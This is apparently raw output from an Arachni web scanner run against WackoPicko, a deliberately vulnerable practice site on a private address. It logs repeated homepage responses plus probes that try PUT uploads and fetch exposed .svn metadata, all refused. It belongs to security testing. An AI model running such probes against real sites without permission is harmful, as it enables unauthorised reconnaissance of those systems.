Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Welcome to WackoPicko</h2>
<p>
On WackoPicko, you can share all your crazy pics with your friends. <br />
But that's not all, you can also buy the rights to the high quality <br />
version of someone's pictures. WackoPicko is fun for the whole family.
</p>
<h3>New Here?</h3>
<p>
<h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
</p>
<p>
<h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
<script>
document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
</script>
</p>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
server
using
PUT
at
http://192.168.0.26/WackoPicko/upload/testing/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec
pointing to
http://192.168.0.26/WackoPicko/upload/testing/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec
.
http://192.168.0.26/WackoPicko/upload/testing/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec
Raw HTTP request used to retrieve the page.
PUT /WackoPicko/upload/testing/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=d5mejo5kr6efhtf1dlak7b04m1 Content-Length: 55 Expect: 100-continue Created by Arachni. PUTca890a60d2e09a1de6dc78b0f4d0f8ec
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 100 Continue
HTTP/1.1 405 Method Not Allowed
Date: Mon, 06 Aug 2018 22:53:12 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Allow: GET,HEAD,POST,OPTIONS,TRACE
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 234
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>405 Method Not Allowed</title>
</head><body>
<h1>Method Not Allowed</h1>
<p>The requested method PUT is not allowed for the URL /WackoPicko/upload/testing/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec.</p>
</body></html>
Raw HTTP request used to retrieve the page.
GET /WackoPicko/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Welcome to WackoPicko</h2>
<p>
On WackoPicko, you can share all your crazy pics with your friends. <br />
But that's not all, you can also buy the rights to the high quality <br />
version of someone's pictures. WackoPicko is fun for the whole family.
</p>
<h3>New Here?</h3>
<p>
<h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
</p>
<p>
<h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
<script>
document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
</script>
</p>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
server
using
GET
at
http://192.168.0.26/WackoPicko/admin/.svn/all-wcprops
pointing to
http://192.168.0.26/WackoPicko/admin/.svn/all-wcprops
.
Raw HTTP request used to retrieve the page.
GET /WackoPicko/admin/.svn/all-wcprops HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=qfbf2kvl5dcva1si172s0r7c64
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 403 Forbidden
Date: Mon, 06 Aug 2018 22:52:10 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 203
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /WackoPicko/admin/.svn/all-wcprops
on this server.</p>
</body></html>
Raw HTTP request used to retrieve the page.
GET /WackoPicko/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Welcome to WackoPicko</h2>
<p>
On WackoPicko, you can share all your crazy pics with your friends. <br />
But that's not all, you can also buy the rights to the high quality <br />
version of someone's pictures. WackoPicko is fun for the whole family.
</p>
<h3>New Here?</h3>
<p>
<h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
</p>
<p>
<h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
<script>
document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
</script>
</p>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
server
using
GET
at
http://192.168.0.26/WackoPicko/admin/.svn/wc.db
pointing to
http://192.168.0.26/WackoPicko/admin/.svn/wc.db
.
Raw HTTP request used to retrieve the page.
GET /WackoPicko/admin/.svn/wc.db HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=qfbf2kvl5dcva1si172s0r7c64
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 403 Forbidden
Date: Mon, 06 Aug 2018 22:52:10 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /WackoPicko/admin/.svn/wc.db
on this server.</p>
</body></html>
Raw HTTP request used to retrieve the page.
GET /WackoPicko/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Welcome to WackoPicko</h2>
<p>
On WackoPicko, you can share all your crazy pics with your friends. <br />
But that's not all, you can also buy the rights to the high quality <br />
version of someone's pictures. WackoPicko is fun for the whole family.
</p>
<h3>New Here?</h3>
<p>
<h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
</p>
<p>
<h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
<script>
document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
</script>
</p>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
server
using
PUT
at
http://192.168.0.26/WackoPicko/upload/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec
pointing to
http://192.168.0.26/WackoPicko/upload/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec
.
Raw HTTP request used to retrieve the page.
PUT /WackoPicko/upload/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=qfbf2kvl5dcva1si172s0r7c64 Content-Length: 55 Expect: 100-continue Created by Arachni. PUTca890a60d2e09a1de6dc78b0f4d0f8ec
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 100 Continue
HTTP/1.1 405 Method Not Allowed
Date: Mon, 06 Aug 2018 22:51:23 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Allow: GET,HEAD,POST,OPTIONS,TRACE
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 229
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>405 Method Not Allowed</title>
</head><body>
<h1>Method Not Allowed</h1>
<p>The requested method PUT is not allowed for the URL /WackoPicko/upload/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec.</p>
</body></html>
Raw HTTP request used to retrieve the page.
GET /WackoPicko/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Welcome to WackoPicko</h2>
<p>
On WackoPicko, you can share all your crazy pics with your friends. <br />
But that's not all, you can also buy the rights to the high quality <br />
version of someone's pictures. WackoPicko is fun for the whole family.
</p>
<h3>New Here?</h3>
<p>
<h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
</p>
<p>
<h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
<script>
document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
</script>
</p>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
server
using
GET
at
http://192.168.0.26/WackoPicko/upload/.svn/wc.db
pointing to
http://192.168.0.26/WackoPicko/upload/.svn/wc.db
.
Raw HTTP request used to retrieve the page.
GET /WackoPicko/upload/.svn/wc.db HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=qfbf2kvl5dcva1si172s0r7c64
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 403 Forbidden
Date: Mon, 06 Aug 2018 22:51:26 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 200
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /WackoPicko/upload/.svn/wc.db
on this server.</p>
</body></html>
Raw HTTP request used to retrieve the page.
GET /WackoPicko/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
